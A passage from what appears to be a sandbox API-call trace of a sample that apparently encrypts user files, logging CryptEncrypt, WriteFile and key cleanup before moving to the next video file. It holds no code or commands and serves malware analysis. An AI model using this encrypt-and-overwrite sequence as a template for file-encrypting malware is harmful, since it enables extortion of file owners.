hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0102.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.228] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.228] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.231] PeekMessageW (in: lpMsg=0x144e02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e02c) returned 0 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0102.231] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0102.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.231] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0102.232] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0102.232] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0102.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.232] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0102.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb6e8) returned 0x45384e0 [0102.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0102.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0102.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caeb0 [0102.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.236] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xb6e8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xb6f0) returned 1 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0102.236] CharLowerBuffW (in: lpsz="byte[46833]", cchLength=0xb | out: lpsz="byte[46833]") returned 0xb [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0102.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0102.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0102.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cae38 [0102.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.239] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x45384e0*, pdwDataLen=0x144e088*=0xb6e8, dwBufLen=0xb6f0 | out: pbData=0x45384e0*, pdwDataLen=0x144e088*=0xb6f0) returned 1 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0102.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0102.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0102.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0102.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0102.240] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0102.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0102.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.240] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xb6f0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0xb6f0, lpOverlapped=0x0) returned 1 [0102.285] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0102.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cacb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0102.285] CryptDestroyKey (hKey=0x41ac200) returned 1 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.286] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0102.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0102.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.286] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0102.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0102.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0102.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0102.286] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0102.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0102.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.287] FreeLibrary (hLibModule=0x756e0000) returned 1 [0102.287] CloseHandle (hObject=0x298) returned 1 [0102.287] CloseHandle (hObject=0x258) returned 1 [0102.313] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi", lpFilePart=0x0) returned 0x58 [0102.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0102.313] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\iq0i29q qvtpwyuvmy.avi")) returned 0x20 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0102.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 